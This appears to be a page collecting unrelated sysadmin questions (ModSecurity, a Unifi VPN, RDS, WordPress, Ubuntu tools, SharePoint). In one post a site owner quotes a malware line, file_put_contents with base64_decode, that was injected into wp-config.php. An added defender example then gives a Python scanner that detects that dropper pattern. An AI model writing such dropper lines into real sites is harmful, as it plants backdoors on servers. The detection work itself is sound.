Is `SecAction` order important for an OWASP ModSecurity config file?

Using a web server with Nginx + ModSecurity + OWASP ModSecurity Core Rules…

In the OWASP config file crs-setup.conf, is the order of the SecAction config sections important, or can I order them differently from the example config file?

Example:

```
SecAction \
 "id:900250,\
  phase:1,\
  nolog,\
  pass,\
  t:none,\
  setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /translate/ /if/'"

SecAction \
 "id:900200,\
  phase:1,\
  nolog,\
  pass,\
  t:none,\
  setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
```

By default SecAction id:900200 is written before SecAction id:900250, is that order important?

How to config site-to-site VPN from Unifi USG to OpenVPN server

I’m trying to configure our Unifi USG with a site-to-site VPN into a private OpenVPN server with several computers behind it (which currently works with individual OpenVPN clients). The USG documentation for doing this is a bit vague and I’m looking for clarifications for these four fields:

• Remote Subnets: Click Add Subnet to add an address for a remote network.

So, the remote internal subnet? If server1 is at 172.31.1.2, server 2 is at 172.31.2.3, and server3 is at 172.31.4.5, I could enter 172.31.0.0/16?

• Remote Host: Enter the hostname of the remote router.

Why a hostname when the next field has the IP address? Is this just the reverse lookup of the IP address in the next field?

• Remote Address: Enter the internet IP address and port number of the remote router.

The Internet IP address and port of the OpenVPN server from the .ovpn file?

• Local Address: Enter the internet IP address and port number of the UniFi Security Gateway.

The internal network IP address of the USG, or our static external Internet IP address? And what port to specify here?

Does replica config parameter affect primary/master RDS Postgres?

I want to add hot_standby_feedback = on to a RDS readonly replica.

The problem is that the replica currently has a parameter group already attached, which is inherited from the master. My question is: does adding hot_standby_feedback = on to the master parameter group affect the master instance negatively so that I’d better attach a new parameter group to the replica?

htaccess and wordpress config files are regularly overwritten

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are overwritten with bad information.

This results in two problems – first the DB access details in wp-config are changed to something that doesn’t work, and then the ability to access my post-link permalinks is lost as a result of information being lost from htaccess.

After being overwritten, my wp-config file is full of lines like this:

```
file_put_contents("wp-remote-upload.php", base64_decode('…'));
```

My wp-config file has so many of these lines that it is about 800Kb in size.

The plugins I am using on my WordPress site are as follows:

  • Akismet Anti-Spam [v4.0.1 by Automattic]
  • Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
  • Duplicator [v1.2.3 by Snap Creek]
  • Google Analytics for WordPress [v7.7.1 by MonsterInsights]
  • Hello Dolly [v1.6 by Matt Mullenweg]
  • Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
  • Logo Slider [v1.4.7 by EnigmaWeb]
  • Recent Posts Widget Extended [v0.9.9.7 by Satrya]
  • Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
  • WordPress Importer [v0.6.3 by wordpressdotorg]
  • Yoast SEO [v5.9.1 by Team Yoast]

Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to – however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.


How do I stop these files from being overwritten?

Or how I can discover what is responsible for changing these files?
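A defender-side check for the injected statement quoted in the post above, added here as an example (it is not part of the original post): it flags every `file_put_contents(..., base64_decode(` line, lists the file names those lines would write, and notes when a config file is far larger than expected. The function names, the 16 KB size threshold and the sample text are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Shape of the injected line shown in the post:
#   file_put_contents("<name>", base64_decode('<blob>'));
DROPPER = re.compile(
    r"""file_put_contents\s*\(\s*(['"])(?P<target>[^'"]+)\1\s*,\s*base64_decode\s*\(""",
    re.IGNORECASE,
)

def scan_php_text(text):
    """Return (line_number, target_filename) for each injected-looking line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in DROPPER.finditer(line):
            hits.append((lineno, match.group("target")))
    return hits

def summarize(text, size_limit=16 * 1024):
    """Summarize one file; size_limit is an assumed ceiling for wp-config.php."""
    hits = scan_php_text(text)
    return {
        "hits": len(hits),
        "targets": sorted({target for _, target in hits}),
        "oversized": len(text.encode()) > size_limit,
    }

def scan_tree(root):
    """Walk a site directory and report every .php file containing a hit."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_text(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: two injected lines (the blob is base64 for "ABC")
# and two benign lines that must not be flagged.
SAMPLE = '''<?php
define('DB_NAME', 'example_db');
file_put_contents("wp-remote-upload.php", base64_decode('QUJD'));
FILE_PUT_CONTENTS( 'wp-remote-upload.php' , base64_decode("QUJD") );
$data = base64_decode($row);
file_put_contents("cache.txt", $data);
'''

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The target names it reports are the files to look for next on disk, and comparing their modification times with the web server access log narrows down which request rewrote wp-config.php.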

How to assign a priority number to “update-alternatives --config gdm3.css” in a single cmdline?

I am able to run these commands in the terminal:

```
$ sudo update-alternatives --install /usr/share/gnome-shell/theme/gdm3.css gdm3.css /usr/share/gnome-shell/theme/mytheme/mytheme.css 10
$ sudo update-alternatives --config gdm3.css
There are 2 choices for the alternative gdm3.css (providing /usr/share/gnome-shell/theme/gdm3.css).

  Selection    Path                                                    Priority   Status
------------------------------------------------------------
* 0            /usr/share/gnome-shell/theme/ubuntu.css                  10        auto mode
  1            /usr/share/gnome-shell/theme/mytheme/mytheme.css         10        manual mode
  2            /usr/share/gnome-shell/theme/ubuntu.css                  10        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/share/gnome-shell/theme/mytheme/mytheme.css to provide /usr/share/gnome-shell/theme/gdm3.css (gdm3.css) in manual mode
```

I will put these two cmds in python3.6 subprocess.run().

The issue I have is with the second command. How do I assign /usr/share/gnome-shell/theme/mytheme/mytheme.css to be the alternative of gdm3.css in the same cmdline as sudo update-alternatives --config gdm3.css?

Also, this cmd requires a number entry to select mytheme.css. The assigned number is dependent on the assigned priority, which means the assigned number can be quite arbitrary. How do I overcome the arbitrary nature of the assigned number?

Lubuntu 18.04LTS touchpad config: CLI solution to turn off tapping?

I have seen numerous posts about touchpad issues, but have mainly seen GUI solutions, such as adding “touchpad-indicator” (which didn’t work the way I’d hoped) or synaptics (which froze my keyboard at login requiring a whole reinstall). I have seen a great tutorial of exactly what I hope to accomplish for 18.10 here: anglehit

But the problem is I don’t seem to have an xorg.conf.d file in /etc/X11 in Lubuntu 18.04LTS.

I would love to just open a text editor, change a setting to something like:

tapping = "off" 

Hit save, and be done. Is there any way to do this on Lubuntu 18.04LTS?

Thank you very much.

Purge Guake with config files: Preference files survive somewhere

I need to completely remove Guake. It seems to have some bug that I triggered while setting keybindings. Now the “close tab” keybinding does not work anymore. I tried

```
$ sudo apt-get purge guake
$ sudo apt-get purge --auto-remove guake
```

and different variations of these. When I reinstall Guake, my old preferences are still there: Keybindings, color scheme etc. I can’t locate where the preference files are located though. How can I remove Guake entirely together with the somehow broken preference files?

insufficient sql database permissions for user impersonationlevel config database

What did the user try to do that generated the following error in the wfe server log? I looked at the ULS log for dsmith01 and did not find anything. Please suggest.

Insufficient SQL database permissions for user 'Name: xxx\dsmith01 SID: S-1-5-21-3736358454-1868704084-1822373674-51997 ImpersonationLevel: Impersonation' in database 'SharePoint_Config' on SQL Server instance 'xxxx\SHAREPOINT'. Additional error information from SQL Server is included below.  The EXECUTE permission was denied on the object 'proc_GetTimerRunningJobs', database 'SharePoint_Config', schema 'dbo'.